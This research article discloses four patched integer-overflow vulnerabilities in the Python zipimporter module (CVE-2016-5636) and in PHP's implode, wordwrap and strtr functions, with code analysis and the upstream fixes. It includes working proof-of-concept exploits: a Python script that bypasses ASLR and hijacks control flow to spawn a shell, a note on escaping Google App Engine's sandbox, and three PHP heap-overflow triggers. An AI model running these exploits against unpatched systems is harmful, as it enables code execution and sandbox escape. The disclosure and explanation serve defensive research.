Introduction
Security vulnerabilities in language interpreters are more critical than ordinary software bugs because they can break the trust placed in the trusted computing base (TCB), as Ken Thompson pointed out in his famous Turing Award lecture, published in 1984 [1]. For instance, such vulnerabilities break the security guarantees provided by security analysis tools and code audits, because most of these analyses rest on trust in the language interpreter. Instead of starting from the low-level parts of a machine, such an analysis treats the interpreter as the root of trust and then performs static and dynamic analyses over the language abstraction to find bugs in the software. Although these analyses can catch bugs at the code level, they cannot detect vulnerabilities in the underlying interpreter. If one of these hidden vulnerabilities is exploited, it breaks the guarantees established by the analyses performed over the code.
Another setting strongly affected by such bugs is the language-interpreter sandbox used by cloud providers. Providers such as Google App Engine modified the language interpreter to create a sandbox that offers cloud guests only a restricted environment (e.g., one that cannot execute shell commands or call OS-related functions). The main purpose of such sandboxes is to isolate guests and limit their resource usage without running the code in virtual machines, which is costly in performance. However, since the sandbox's restrictions are enforced by a trusted language interpreter, isolation cannot be guaranteed once an attacker exploits a vulnerability in the interpreter.
In this article, we demonstrate four integer overflow vulnerabilities in the Python and PHP interpreters, found in our recent research [2], that can be exploited for control-flow hijacking. These vulnerabilities undermine trust in language interpreters and thus break the security guarantees of language runtime sandboxes. Note that all the vulnerabilities disclosed here have already been patched in the upstream releases of Python and PHP.
Python zipimporter heap overflow (CVE-2016-5636)
zipimport
$ python
>>> import sys
>>> sys.path
[..., '/usr/local/lib/python2.7/dist-packages/aenum-1.4.5-py2.7.egg', ...]
$ file /usr/local/lib/python2.7/dist-packages/aenum-1.4.5-py2.7.egg
/usr/local/lib/python2.7/dist-packages/aenum-1.4.5-py2.7.egg: Zip archive data, at least v2.0 to extract
sys.path, the list of module search paths, contains not only directories but also ZIP files. The zipimport module provides the means to import Python modules from ZIP-format archives.
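For readers unfamiliar with the mechanism, here is a minimal Python 3 sketch (not taken from the original PoC) that imports a module straight from a ZIP archive placed on sys.path. The helper import_from_zip and the module name zipdemo_greeting are hypothetical; the point is only that a ZIP path on sys.path is served by zipimport.

```python
import importlib
import os
import sys
import tempfile
import zipfile


def import_from_zip(module_name, source):
    """Write one module into a fresh ZIP archive and import it through sys.path."""
    archive = os.path.join(tempfile.mkdtemp(), "bundle.zip")
    with zipfile.ZipFile(archive, "w") as zf:
        zf.writestr(module_name + ".py", source)
    # A ZIP file on sys.path is handled by the built-in zipimport path hook.
    sys.path.insert(0, archive)
    try:
        importlib.invalidate_caches()
        return importlib.import_module(module_name)
    finally:
        sys.path.remove(archive)


mod = import_from_zip("zipdemo_greeting", "GREETING = 'hello from a zip'\n")
print(mod.GREETING)                   # hello from a zip
print(type(mod.__loader__).__name__)  # zipimporter
```

The loader attached to the imported module is a zipimporter instance, the same class the PoC below manipulates.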
Vulnerability
// zipimporter.c
bytes_size = compress == 0 ? data_size : data_size + 1;
if (bytes_size == 0)
    bytes_size++;
raw_data = PyBytes_FromStringAndSize((char *)NULL, bytes_size);
The vulnerability exists in the ZIP file decoder of the zipimporter module: data_size, which is read from the ZIP file, is not properly validated. If data_size is 0xffffffff (-1) and compress is non-zero, then data_size + 1 evaluates to zero, and the check that follows bumps bytes_size, the size of the buffer that stores the file data, to one. Later, Python reads the file data into this one-byte buffer, which causes a heap overflow.
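To make the arithmetic concrete, the following Python sketch replays the size computation with the values described above. It models only the three quoted C lines, not the real decoder; as_signed32 and bytes_size_for are hypothetical helpers.

```python
import struct


def as_signed32(raw):
    """Reinterpret a 32-bit unsigned field as a signed value (0xffffffff -> -1)."""
    return struct.unpack("<i", struct.pack("<I", raw))[0]


def bytes_size_for(data_size, compress):
    """Mirror the three C lines quoted above from zipimporter.c."""
    bytes_size = data_size if compress == 0 else data_size + 1
    if bytes_size == 0:
        bytes_size += 1
    return bytes_size


data_size = as_signed32(0xFFFFFFFF)
print(data_size)                              # -1
print(bytes_size_for(data_size, compress=1))  # 1
print(bytes_size_for(100, compress=1))        # 101 (a benign entry)
```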
Bypass ASLR
>>> hex(id('a'))
'0x7f6c2c677710'
To achieve arbitrary code execution, we need to bypass ASLR. Fortunately, CPython uses an object's memory address as its id, so the built-in id() leaks addresses and lets us bypass ASLR.
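One way to confirm that id() exposes a raw address (a CPython implementation detail, not a language guarantee) is to turn the integer back into an object reference with ctypes. This sketch is for illustration only and relies on CPython behavior.

```python
import ctypes

obj = "some object"
addr = id(obj)
print(hex(addr))  # a heap address; the value changes from run to run

# Treat the integer as a PyObject* and read the object back through ctypes.
# This works only because, in CPython, id() returns the object's address.
same = ctypes.cast(addr, ctypes.py_object).value
print(same is obj)  # True
```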
Proof of Concept
#!/usr/bin/env python2
import os
import zipimport
import zipfile
import struct
FILE = 'payload'
ZIP = 'import.zip'
DIR = 'sh'
if not os.path.exists(DIR):
    os.mkdir(DIR)
addr = id("A")
libc_base = addr
# NOTE: 0x46640 and 0x7b1998 are offsets tied to the specific build this PoC was written against.
system_addr = libc_base + 0x46640
print("LIBC_BASE : %x" % libc_base)
bin_sh = os.path.join(DIR, struct.pack('<Q', libc_base + 0x7b1998).replace("\x00", ""))
with open(bin_sh, 'w') as f:
    f.write("/bin/sh")
os.chmod(bin_sh, 0777)
os.putenv("PATH", os.getenv("PATH") + ":" + DIR)
some_string_obj = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"
some_string_obj += "QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZaaaabbbbccccddddeeeeffff"
some_string_obj += "gggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuuvvvv"
some_string_obj += "wwwwxxxxyyyyzzzz"
some_string_obj += "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"
some_string_obj += "QQQQRRRRSSSSTTTTUUUU"
print("%x" % id(some_string_obj))
# func addr here
some_string_obj += struct.pack('<Q', system_addr)
a = some_string_obj
addr = id(a)
addrs = []
for i in xrange(8):
    addrs.append(addr % 0x100)
    addr /= 0x100
addrs_2 = map(lambda x:chr(x), addrs)
print(addrs_2)
print("%x" % id(some_string_obj))
# generate input
with open(FILE, 'wb') as f:
    payload = ("aaaa"+("".join(addrs_2)) * 128)
    f.write(payload)
zf = zipfile.PyZipFile(ZIP, mode='w')
zf.write(FILE)
zf.close()
importer = zipimport.zipimporter(ZIP)
f = list(importer._files[FILE])
f[1] = 1   # compress: non-zero
f[2] = -1  # data_size: 0xffffffff read as -1
importer._files[FILE] = tuple(f)
importer.get_data(FILE)
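The loop in the PoC that splits addr into bytes is simply little-endian packing of a 64-bit value, the same encoding the PoC already uses via struct.pack('<Q', ...). The Python 3 sketch below checks that equivalence; split_bytes_like_poc is a hypothetical helper name.

```python
import struct


def split_bytes_like_poc(addr):
    """Same loop as the PoC: emit the 8 low-order bytes, least significant first."""
    out = []
    for _ in range(8):
        out.append(addr % 0x100)
        addr //= 0x100
    return bytes(out)


sample = 0x7F6C2C677710  # the id() value shown in the ASLR section
assert split_bytes_like_poc(sample) == struct.pack("<Q", sample)
assert split_bytes_like_poc(sample) == sample.to_bytes(8, "little")
print(split_bytes_like_poc(sample).hex())  # 1077672c6c7f0000
```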
Google App Engine
Since zipimport is an essential Python module, it is on the whitelist of Google App Engine's Python sandbox. Consequently, an attacker can exploit this vulnerability to break out of the sandbox. We reported this issue to Google upon its discovery.
Integer Overflow in PHP
In PHP v7.0.2, strings are generally allocated by the zend_string_alloc() function.
// zend/zend_string.h
static zend_always_inline zend_string *zend_string_alloc(size_t len, int persistent)
{
    zend_string *ret = (zend_string *)pemalloc(ZEND_MM_ALIGNED_SIZE(_ZSTR_STRUCT_SIZE(len)), persistent);
    GC_REFCOUNT(ret) = 1;
    // ...
    ZSTR_LEN(ret) = len;
    return ret;
}
The function is a wrapper around pemalloc: it computes the allocation size from the len argument (the zend_string header plus room for len characters, aligned) and passes it to pemalloc. The function itself does not appear to have a bug; however, calling it with an arithmetic expression as the length argument can create a vulnerability, because the expression may overflow before the function ever receives it.
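The core problem is that the overflow happens in the caller, before zend_string_alloc receives its argument. The Python sketch below models unsigned size_t arithmetic, assuming a 32-bit size_t (the %eax/%eip register names in the PoC comments suggest a 32-bit x86 build); to_size_t is a hypothetical helper.

```python
SIZE_T_MASK = (1 << 32) - 1  # assumption: 32-bit size_t


def to_size_t(value):
    """Truncate an exact integer the way 32-bit unsigned C arithmetic does."""
    return value & SIZE_T_MASK


# Two very different exact sizes reach the allocator as the same argument,
# so nothing inside the allocator can tell that the caller's expression wrapped.
small = to_size_t(16)
wrapped = to_size_t((1 << 32) + 16)
print(small, wrapped, small == wrapped)  # 16 16 True
```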
Vulnerability example in php_implode
// ext/standard/string.c
PHPAPI void php_implode(const zend_string *delim, zval *arr, zval *return_value)
{
    // ...
    str = zend_string_alloc(len + (numelems - 1) * ZSTR_LEN(delim), 0);
    // ...
}
A vulnerable example is the php_implode function. It invokes zend_string_alloc with the following arithmetic expression as the length argument: len + (numelems - 1) * ZSTR_LEN(delim). An integer overflow can arise in this expression if the values are carefully manipulated. For instance, if the length of the string delim is 65,536, the number of elements is 65,536, and len is 65,536, then with a 32-bit size_t the size value wraps to zero: 65536 + 65535 * 65536 = 4294967296 = 2^32, which is 0 modulo 2^32.
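The wrap-around can be replayed in Python by masking to 32 bits. This is a sketch assuming a 32-bit size_t; implode_alloc_len is a hypothetical name for the quoted expression.

```python
SIZE_T_MASK = (1 << 32) - 1  # assumption: 32-bit size_t


def implode_alloc_len(total_len, numelems, delim_len):
    """len + (numelems - 1) * ZSTR_LEN(delim), in 32-bit unsigned arithmetic."""
    return (total_len + (numelems - 1) * delim_len) & SIZE_T_MASK


exact = 65536 + (65536 - 1) * 65536
print(exact)                                   # 4294967296
print(implode_alloc_len(65536, 65536, 65536))  # 0
```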
The following code shows the proof-of-concept (PoC) that exploits the vulnerability.
<?php
$arr = [];
for ($i = 0; $i < 65536; ++$i) {
    $arr[$i] = "aa";
}
$text1 = str_repeat("ABCD", 16384);
// Changing ABCD into other values will alter %eax and %ecx.
$str = implode($text1, $arr);
?>
Exploiting the vulnerability requires the sizes of the arguments to be chosen so that the expression overflows, as described above. First, we build the delimiter $text1 as a 65,536-byte string (ABCD repeated 16,384 times); implode() then joins the 65,536 elements of $arr with it.
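The PoC values can be checked the same way. Assuming len is the summed length of the array elements (our reading of the elided part of php_implode) and a 32-bit size_t, the sketch below suggests the PoC wraps not to exactly zero but to 65,536 bytes, which is still far less than the roughly 4 GB the joined string needs.

```python
SIZE_T_MASK = (1 << 32) - 1  # assumption: 32-bit size_t

elements = ["aa"] * 65536   # $arr in the PoC
delim = "ABCD" * 16384      # $text1 in the PoC, 65,536 bytes
# Assumption: len is the summed length of the array elements.
total_len = sum(len(e) for e in elements)
needed = total_len + (len(elements) - 1) * len(delim)
allocated = needed & SIZE_T_MASK
print(total_len, needed, allocated)  # 131072 4295032832 65536
```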
We searched for similar cases (i.e., uses of zend_string_alloc with a multiplicative expression) in the ext/standard/string.c file, found three such cases, and successfully created control-flow hijacking exploits for all of them.
php_wordwrap()
// ext/standard/string.c
PHP_FUNCTION(wordwrap)
{
    // ...
    // allocate string into newtext variable
    if (linelength > 0) {
        chk = (size_t)(ZSTR_LEN(text)/linelength + 1);
        newtext = zend_string_alloc(chk * breakchar_len + ZSTR_LEN(text), 0);
        alloced = ZSTR_LEN(text) + chk * breakchar_len + 1;
    } else {
        chk = ZSTR_LEN(text);
        alloced = ZSTR_LEN(text) * (breakchar_len + 1) + 1;
        newtext = zend_string_alloc(ZSTR_LEN(text) * (breakchar_len + 1), 0);
    }
    // ...
    // do multiple memcpy() (simplified excerpt of the copy loop)
    if (...) {
        memcpy(ZSTR_VAL(newtext) + newtextlen, ZSTR_VAL(text) + laststart, current - laststart + breakchar_len);
        memcpy(ZSTR_VAL(newtext) + newtextlen, ZSTR_VAL(text) + laststart, current - laststart);
        memcpy(ZSTR_VAL(newtext) + newtextlen, breakchar, breakchar_len);
        memcpy(ZSTR_VAL(newtext) + newtextlen, ZSTR_VAL(text) + laststart, current - laststart);
    }
}
In the code, wordwrap() allocates memory for the new string by calling zend_string_alloc with a size argument of either chk * breakchar_len + ZSTR_LEN(text) or ZSTR_LEN(text) * (breakchar_len + 1). Either expression can overflow.
In the second expression, ZSTR_LEN(text) * (breakchar_len + 1), if the attacker supplies a 65,536-character (2^16) string as text and a 65,535-character (2^16 - 1) string as breakchar, the result is 65,536 * (65,535 + 1) = 4294967296, which wraps to 0 with a 32-bit size_t. In that case, zend_string_alloc allocates a zero-sized buffer (actually slightly larger than zero, because the allocation includes the zend_string header and is aligned), and the subsequent memcpy calls overwrite the heap.
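Both allocation branches quoted above can be modeled in a few lines. This is a sketch assuming a 32-bit size_t; wordwrap_alloc_len is a hypothetical name, and integer division stands in for the C division of size_t by a positive linelength.

```python
SIZE_T_MASK = (1 << 32) - 1  # assumption: 32-bit size_t


def wordwrap_alloc_len(text_len, break_len, linelength):
    """Size passed to zend_string_alloc by the two branches quoted above."""
    if linelength > 0:
        chk = text_len // linelength + 1
        return (chk * break_len + text_len) & SIZE_T_MASK
    return (text_len * (break_len + 1)) & SIZE_T_MASK


print(wordwrap_alloc_len(65536, 65535, -1))  # 0 (the PoC's arguments)
print(wordwrap_alloc_len(100, 1, 10))        # 111
```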
The following proof-of-concept code triggers the vulnerability.
<?php
$text1 = str_repeat("A", 65536);
$text2 = str_repeat("B", 65536 - 1);
$newtext = wordwrap($text1, -1, $text2); // width -1 (linelength <= 0) selects the second allocation branch
?>
By setting the lengths of the string arguments to 65,536 and 65,535, respectively, we make the subsequent memcpy calls inside wordwrap overflow the heap objects.
php_str_to_str_ex()
// ext/standard/string.c
static zend_string *php_str_to_str_ex(zend_string *haystack,
    char *needle, size_t needle_len, char *str, size_t str_len, zend_long *replace_count)
{
    // ...
    // count is the number of times needle appears in haystack
    new_str = zend_string_alloc(count * (str_len - needle_len) + ZSTR_LEN(haystack), 0);
    // ...
    e = s = ZSTR_VAL(new_str);
    end = ZSTR_VAL(haystack) + ZSTR_LEN(haystack);
    for (p = ZSTR_VAL(haystack); (r = (char*)php_memnstr(p, needle, needle_len, end)); p = r + needle_len) {
        memcpy(e, p, r - p);
        e += r - p;
        memcpy(e, str, str_len);
        e += str_len;
        (*replace_count)++;
    }
    if (p < end) {
        memcpy(e, p, end - p);
        e += end - p;
    }
    // ...
}
The variable new_str is allocated with zend_string_alloc using the multiplicative expression count * (str_len - needle_len) + ZSTR_LEN(haystack). If this value overflows, and therefore less memory than expected is allocated, the memcpy calls in the following for loop cause a heap overflow.
The following PoC exploits the bug.
<?php
$a = str_repeat('A', 65536);
$b = str_repeat('ABCD', 32768);
// Changing 'ABCD' into other value alters %eip to arbitrary value.
$c = array('AA'=> $b);
strtr($a , $c);
?>
The haystack is a string of length 65,536 and the needle is 'AA', so count is 32,768 ('A' * 65,536 splits into 32,768 occurrences of 'AA'), and str_len is 131,072 ('ABCD' * 32,768 = 131,072 bytes). Therefore, the expression passed to zend_string_alloc is 32768 * (131072 - 2) + 65536 = 4294967296, which wraps to 0 with a 32-bit size_t. Since the string object is allocated with size zero, running memcpy over it in the for loop triggers a heap overflow.
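The same numbers can be reproduced in Python, assuming a 32-bit size_t. str.count counts non-overlapping matches, which matches the replace loop above advancing p past each match by needle_len.

```python
SIZE_T_MASK = (1 << 32) - 1  # assumption: 32-bit size_t

haystack = "A" * 65536
needle = "AA"
replacement = "ABCD" * 32768

count = haystack.count(needle)  # non-overlapping matches, like the replace loop
size = (count * (len(replacement) - len(needle)) + len(haystack)) & SIZE_T_MASK
print(count, len(replacement), size)  # 32768 131072 0
```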
A Patch: zend_string_safe_alloc()
We reported these three vulnerabilities to PHP, and all of them were patched in PHP v7.0.4. The patches were very simple: they just changed zend_string_alloc to zend_string_safe_alloc. Let's take a look at how this prevents the integer overflow bugs.
//zend_string.h
static zend_always_inline zend_string *zend_string_safe_alloc(size_t n, size_t m, size_t l, int persistent)
{
    // calls _safe_malloc
    zend_string *ret = (zend_string *)safe_pemalloc(n, m, ZEND_MM_ALIGNED_SIZE(_ZSTR_STRUCT_SIZE(l)), persistent);
    GC_REFCOUNT(ret) = 1;
    // ...
    ZSTR_LEN(ret) = (n * m) + l;
    return ret;
}
// zend_alloc.c
// _safe_malloc calls safe_address, which uses zend_safe_address to check whether n * m + offset overflows.
ZEND_API void* ZEND_FASTCALL _safe_malloc(size_t nmemb, size_t size, size_t offset)
{
    // calls safe_address
    return pemalloc(safe_address(nmemb, size, offset), 1);
}
static zend_always_inline size_t safe_address(size_t nmemb, size_t size, size_t offset)
{
    int overflow;
    size_t ret = zend_safe_address(nmemb, size, offset, &overflow);
    if (UNEXPECTED(overflow)) {
        zend_error_noreturn(E_ERROR, "Possible integer overflow in memory allocation (%zu * %zu + %zu)", nmemb, size, offset);
        return 0;
    }
    return ret;
}
// zend_multiply.h (GCC, 32-bit x86 variant)
static zend_always_inline size_t zend_safe_address(size_t nmemb, size_t size, size_t offset, int *overflow)
{
    size_t res = nmemb;
    size_t m_overflow = 0;
    // mull: edx:eax = eax * size; addl: eax += offset; adcl: edx += carry
    __asm__ ("mull %3\n\taddl %4,%0\n\tadcl $0,%1"
        : "=&a"(res), "=&d" (m_overflow)
        : "%0"(res),
          "rm"(size),
          "rm"(offset));
    // a non-zero high word means nmemb * size + offset does not fit in 32 bits
    if (UNEXPECTED(m_overflow)) {
        *overflow = 1;
        return 0;
    }
    *overflow = 0;
    return res;
}
Unlike zend_string_alloc, which takes an already computed (and possibly already overflowed) expression as its argument, zend_string_safe_alloc takes the factors of the size and performs the multiplication internally. In particular, zend_string_safe_alloc calls _safe_malloc, which calls safe_address, which finally calls zend_safe_address. In zend_safe_address, the inline assembly checks whether multiplying the factors (and adding the offset) overflows. If an overflow occurs, the allocation fails with an error message (see the if (UNEXPECTED(overflow)) check in safe_address()).
Therefore, these integer overflow vulnerabilities no longer exist in the
latest version of PHP.
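To see why the assembly catches the overflow, here is a Python model of the 32-bit x86 sequence, assuming each operand fits in 32 bits. It is a sketch of the check's logic, not PHP's code: safe_address32 is a hypothetical name, and raising OverflowError stands in for zend_error_noreturn.

```python
MASK32 = 0xFFFFFFFF


def safe_address32(nmemb, size, offset):
    """Model of the mull/addl/adcl sequence in the 32-bit zend_safe_address."""
    product = nmemb * size                   # mull: 64-bit result in edx:eax
    eax, edx = product & MASK32, product >> 32
    total = eax + offset                     # addl: may carry out of eax
    eax, carry = total & MASK32, total >> 32
    edx += carry                             # adcl $0: fold the carry into edx
    if edx:
        raise OverflowError(
            "Possible integer overflow in memory allocation "
            f"({nmemb} * {size} + {offset})")
    return eax


print(safe_address32(100, 3, 5))  # 305
try:
    safe_address32(65536, 65536, 0)  # the wordwrap case: 65,536 * (65,535 + 1)
except OverflowError as exc:
    print(exc)
```

Because the factors reach the check separately, the high word of the product is still visible, which is exactly the information a single precomputed size_t argument has already lost.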
[1] Thompson, K. (1984). Reflections on trusting trust. Communications of the ACM, 27(8), 761-763.
[2] Yun, I., et al. (2016). APISAN: Sanitizing API Usages through Semantic Cross-checking. In Proceedings of the 25th USENIX Security Symposium (Security), Austin, TX.